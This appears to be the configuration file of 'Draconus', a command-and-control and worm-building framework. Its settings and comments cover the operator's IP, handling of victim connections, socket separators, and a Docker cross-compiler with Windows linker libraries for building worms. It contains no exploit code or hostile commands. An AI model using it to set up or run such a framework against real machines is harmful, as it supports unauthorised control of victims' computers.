[CONFIG]
############################################################################################################################################
#### Your machine's IP address. Draconus uses it to create servers and worms.
IP = 192.168.100.4
############################################################################################################################################

############################################################################################################################################
#### Display of unimportant information. Draconus will not display unimportant notifications and messages from clients.
#### A useful option when you handle many connections. 
#### At the beginning of your adventure with the program, I recommend enabling this option.
SHOW_NO_IMPORTANT_MESSAGES = True
############################################################################################################################################

############################################################################################################################################
#### Console screen width. You can select 3 options: 
#### 'small' for small screens ( about 140 characters).
#### 'medium' (default) for screens of about 180 characters. 
#### 'big' for large screens of about 220 characters.
CONSOLE_SCREEN = 200
############################################################################################################################################

############################################################################################################################################
#### The time given in seconds after which the 'RAW' message will be displayed.
#### Some scripts directly intercept every output on the victim side and can send every single byte.
#### The so-called 'RAW_BUFFER' tries to put these bytes together and try to display them correctly.
#### This option determines how many seconds it should take pieces of a message before it puts it together and displays it.
TCP_RAW_BUFFER_TIMEOUT = 1
############################################################################################################################################

############################################################################################################################################
#### Default encoding for TCP communications.
TCP_SOCKET_FORMAT = utf-8
#### Default encoding for Unix Sockets.
UNIX_SOCKET_FORMAT = utf-8
############################################################################################################################################

############################################################################################################################################
#### Message separator in TCP communication. Use of the separator is to reduce errors in receiving information through network sockets.
#### Each message is separated by a separator.
#### If you want you can change this value, however, worms created with a different separator will cause errors in communication with Draconus.
TCP_SOCKET_SEPARATOR = <AAAAAAAAAAA>
UNIX_SOCKET_SEPARATOR = $$@@$$
############################################################################################################################################

############################################################################################################################################
#### This is the amount (in bytes) of data received in each step from the network socket.
#### If there are errors in TCP communications then you can try to change this value.
#### It is unlikely that you would need to change this option.
TCP_SOCKET_RAW_LEN = 1024
UNIX_SOCKET_RAW_LEN = 2048
############################################################################################################################################

############################################################################################################################################
#### Displays messages in Draconus. This option has no effect on Commander. Useful for debugging. 
VANILLA_PRINT = False
############################################################################################################################################

############################################################################################################################################
#### The core compiler used by default during compilation. This is a Docker image with compilers and a set of tools.
#### Available:
#### - CrossComp
DEFAULT_COMPILER_CORE = CrossComp
############################################################################################################################################

############################################################################################################################################
#### The name for the compiler container. This is the name under which the container will be created from the Docker image.
COMPILER_CONTAINER_NAME = crosscomp2
############################################################################################################################################

############################################################################################################################################
#### Default DLLs included during compilation for the linker.
#### Separate library names with a comma ','. Do not use spaces.
#### ex: lkernel32,lmsvcrt,luser32
DEFAULT_LINKER_DLL = lkernel32,lmsvcrt,luser32,lshell32,lws2_32,lshlwapi
############################################################################################################################################

############################################################################################################################################
#### Logs file name
DRACONUS_LOGS_FILE_NAME = Draconus_log.txt
HIVE_LOGS_FILE_NAME = Hive_log.txt
############################################################################################################################################

############################################################################################################################################
#### Messages color
BASIC_MSG = yellow
NO_IMP_MSG = yellow
ERROR_MSG = red

############################################################################################################################################



############################################################################################################################################
############################################################################################################################################
############################################################################################################################################
############################################################################################################################################
############################################################################################################################################
#### For dev
[DEV]
TASK_PAUSE_CLEAN = 1
TCP_SOCKET_TIMEOUT_LISTENING = 1
TCP_SOCKET_TIMEOUT_RECIVE = 1
UNIX_SOCKET_TIMEOUT_RECIVE = 1
CENTRAL_CLEANER_TIME_PAUSE = 1
DEV_MSG = True
